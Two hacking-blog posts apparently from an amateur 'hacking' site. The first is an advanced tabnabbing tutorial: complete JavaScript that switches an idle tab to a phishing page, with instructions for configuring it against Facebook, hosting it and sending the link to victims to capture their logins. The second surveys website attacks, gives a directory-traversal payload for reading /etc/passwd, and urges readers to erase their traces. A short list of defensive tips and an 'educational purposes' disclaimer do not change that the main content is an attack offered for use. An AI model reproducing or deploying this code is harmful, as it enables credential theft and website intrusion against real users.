Hacking Simplified

Hey friends, today i am going to How to Hack emails, social networking websites and other websites involving login information. The technique that i am going to teach you today is Advanced Tabnabbing. I have already explained what is basic tabnabbing today we will extend our knowledge base, i will explain things with practical example. So lets learn..

Advanced Tabnabbing Tutorial

I will explain this tutorial  using attack scenario and live example and how to protect yourself from such stuff.

Let consider a attack scenario:

1. A hacker say(me r.k) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)

2. I (r.k) sends a copy of this web page to victim whose account or whatever i want to hack.

3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.

4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.

5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.

6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.

Here end's the attack scenario for advanced tabnabbing.

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do.  Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 10 years of imprisonment, if got caught in doing so.

Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.

Follow below measure to protect yourself from Tabnabbing:

1. Always use anti-java script plugin's in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.

2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.

3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.

4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.

5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.

That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..

Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.

First sample code for doing tabnabbing with the help of iframes:

 <!--
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: De$trUcTiVe M!ND (lokesh@hackingloops.com)
Website: http://www.hackingloops.com
Version:1.6
-->

<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>

<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";

//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
 BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;

//Set FAVICON
if(REAL_FAVICON){
 var link = document.createElement('link');
 link.type = 'image/x-icon';
 link.rel = 'shortcut icon';
 link.href = REAL_FAVICON;
 document.getElementsByTagName('head')[0].appendChild(link);
}

//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);

//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();

//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
 el_tabnab.onblur = function(){
 TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
 }
 el_tabnab.onfocus= function(){
 if(TIMER) clearTimeout(TIMER);
 }
} else {
 setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}

function TabNabIt(){
 if(SWITCHED == "false"){
 //Redirect the iframe to FAKE_PAGE_URL
 el_tabnab.src=FAKE_PAGE_URL;
 //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
 if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;

 //Change the favicon -- This doesn't seem to work in IE
 if(BROWSER_TYPE != "Internet Explorer"){
 var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
 for (var i=0; i<links.length; i++) {
 var looplink = links[i];
 if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
 document.getElementsByTagName("head")[0].removeChild(looplink);
 }
 }
 var link = document.createElement("link");
 link.type = "image/x-icon";
 link.rel = "shortcut icon";
 link.href = FAKE_FAVICON;
 document.getElementsByTagName("head")[0].appendChild(link);
 }
 }
}
</script>

</body>
</html>

Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.

Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).

That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
A comment of appreciation will do the work..

Hello friends , today i will explain all the methods that are being used to hack a website or websites database. This is the first part of the hacking websites tutorial where i will explain in brief all methods for hacking or defacing websites. Today I will give you the overview and in later tutorials we will discuss them one by one with practical examples. So guys get ready for first part of Hacking websites class.... Don't worry i will also tell you how to protect your websites from these attacks and other methods like hardening of SQL and hardening of web servers and key knowledge about CHMOD rights that what thing should be give what rights...

Note : This post is only for Educational Purpose only.

What are basic things you should know before website hacking?

First of all everything is optional as i will start from very scratch. But you need atleast basic knowledge of following things..

1. Basics of HTML, SQL, PHP.

2. Basic knowledge of Javascript.

3. Basic knowledge of servers that how servers work.

4. And most important expertize in removing traces otherwise u have to suffer consequences.

Now First two things you can learn from a very famous website for basics of Website design with basics of HTML,SQL,PHP and javascript.

http://www.w3schools.com/

And for the fourth point that you should be expert in removing traces. I will explain this in my future articles. So keep reading.. or simply subscribe my posts..

As we know traces are very important. Please don't ignore them otherwise you can be in big trouble for simply doing nothing. so please take care of this step.

METHODS OF HACKING WEBSITE:

1. SQL INJECTION

2. CROSS SITE SCRIPTING

3. REMOTE FILE INCLUSION

4. LOCAL FILE INCLUSION

5. DDOS ATTACK

6. EXPLOITING VULNERABILITY.

1. SQL INJECTION

First of all what is SQL injection? SQL injection is a type of security exploit or loophole in which a attacker "injects" SQL code through a web form or manipulate the URL's based on SQL parameters. It exploits web applications that use client supplied SQL queries.
The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.

Cross site scripting (XSS) occurs when a user inputs malicious data into a website, which causes the application to do something it wasn’t intended to do. XSS attacks are very popular and some of the biggest websites have been affected by them including the FBI, CNN, Ebay, Apple, Microsft, and AOL.Some website features commonly vulnerable to XSS attacks are:
• Search Engines
• Login Forms
• Comment Fields

Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.

I will explain this in detail in later hacking classes. So keep reading..


3. REMOTE FILE INCLUSION
Remote file inclusion is the most often found vulnerability on the website.
Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local
exploits to escalate his privileges and take over the whole system.
RFI can lead to following serious things on website :

• Code execution on the web server
• Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS).
• Denial of Service (DoS)
• Data Theft/Manipulation

4. LOCAL FILE INCLUSION
Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory transversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFI’s.
Let’s say a hacker found a vulnerable site, www.target-site.com/index.php?p=about, by means of directory transversal he would try to browse to the /etc/passwd file:

www.target-site.com/index.php?p= ../../../../../../../etc/passwd

I will explain it in detail with practical websites example in latter sequential classes on Website Hacking.
Simply called distributed denial of service attack. A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. In DDOS attack we consumes the bandwidth and resources of any website and make it unavailable to its legitimate users.
Its not a new category it comprises of above five categories but i mentioned it separately because there are several exploits which cannot be covered in the above five categories. So i will explain them individually with examples. The basic idea behind this is that find the vulnerability in the website and exploit it to get the admin or moderator privileges so that you can manipulate the things easily.

I hope you all now have a overview of that what is Website Hacking. In consecutive future classes i will explain all of these techniques in details. So guys keep reading..

IF YOU HAVE ANY QUERIES ASK IN COMMENTS...